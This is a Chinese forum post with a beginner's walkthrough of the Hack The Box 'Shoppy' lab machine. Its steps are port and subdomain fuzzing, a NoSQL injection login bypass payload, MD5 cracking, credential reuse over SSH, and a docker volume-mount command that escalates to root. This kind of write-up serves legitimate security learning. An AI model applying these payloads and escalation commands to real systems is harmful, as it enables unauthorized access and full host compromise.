首页
社区
课程
招聘
[原创]HTB Shoppy(easy)
发表于: 2022-11-3 17:42 932

[原创]HTB Shoppy(easy)

2022-11-3 17:42
932

题目链接 20fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6S2M7s2m8Q4x3X3g2Z5j5h3y4C8N6r3S2W2j5X3!0^5i4K6u0W2j5$3!0E0i4K6u0r3L8h3q4U0K9r3W2F1k6i4y4Q4x3V1k6e0K9r3!0H3M7s2V1`.
小白学习web安全 ,借鉴大佬的wp
03bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6P5i4y4@1k6h3#2%4k6h3q4C8L8X3g2K6M7#2)9J5k6h3y4G2L8g2)9J5c8Y4y4Z5L8%4m8H3P5g2)9J5k6s2N6J5K9i4c8W2N6i4m8Q4x3X3c8Z5j5h3y4C8N6r3S2W2j5X3!0^5i4K6u0V1z5e0S2X3j5$3b7$3y4U0W2W2x3o6M7#2
b5eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6B7j5i4u0J5L8$3c8J5K9i4A6G2M7W2)9J5k6h3y4G2L8g2)9J5c8Y4y4Z5L8%4m8H3P5g2)9J5k6s2N6J5K9i4c8W2i4K6u0V1N6i4m8Q4x3X3c8Z5N6r3u0Q4x3V1j5`.

1
sudo vim /etc/hosts

图片描述
使用rustscan进行端口扫描

1
rustscan  shoppy.htb -r 1-65535

在这里下载词典
00eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6G2M7X3c8D9K9i4y4@1M7#2)9J5k6h3q4K6M7$3g2@1L8X3!0@1k6g2)9J5k6h3W2G2i4K6u0r3
47dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6V1j5h3&6A6k6h3I4E0K9h3g2K6M7$3I4W2M7W2)9J5c8W2y4W2j5@1I4A6M7%4c8K6
根据词典所在的路径扫目录和子域名ffuf kali自带
-u –要扫的网址
-w –要用的词典
-H -使用 HTTP
-fs -过滤掉响应大小为169的结果

1
ffuf -u http://shoppy.htb/FUZZ -w /home/hml189/Desktop/wordlist/data/manual/2m-subdomains.txt
1
ffuf -w /home/hml189/Desktop/wordlist/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://shoppy.htb -H "Host:FUZZ.shoppy.htb" -fs  169

图片描述
图片描述
发现login和admin,访问发现登陆页面和子域名
进行sql注入尝试,在注入 SQL 时,页面卡住了,猜测是使用得非关系数据库MongoDB,使用noSQL注入

1
admin’ || ‘1==1

图片描述
图片描述
在搜索页面继续注入
图片描述
图片描述
Kali 上使用 Hash-Identifier 确认是否为md5。
图片描述
图片描述
之后解 md5得 remembermethisway

1
sudo vim /etc/hosts

图片描述
mattermost.shoppy.htb是最重要的登录页面。经过谷歌搜索后发现 Mattermost似乎是一款供开发使用的开源协作软件。使用Josh的用户密码登录。
图片描述
登陆后发现机器的用户密码,使用ssh连接,成功登录
图片描述
使用sudo -l后看到用户jaeger可以在sudo权限下运行的所有命令
图片描述
我们可以在没有deploy密码的情况下运行password-manager脚本

1
sudo -u deploy /home/deploy/password-manager

让输入密码 ,但是没有
cat /home/deploy/password-manager看看里面有什么
图片描述
发现密码
图片描述
现在有了 deploy 的密码,登录看看
图片描述
发现在docker里,使用 这个帖子里的payload进行权限提升
e09K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4N6r3k6G2j5X3W2F1M7#2)9J5k6h3N6A6N6r3S2#2j5W2)9J5k6h3W2G2i4K6u0r3k6%4c8X3L8$3u0A6L8Y4y4Q4x3V1k6V1L8$3y4C8k6i4u0Q4x3V1k6Q4x3U0y4K6K9r3g2D9L8l9`.`.

1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

图片描述


[培训]科锐逆向工程师培训第53期2025年7月8日开班!

最后于 2022-12-29 14:27 被hml189编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回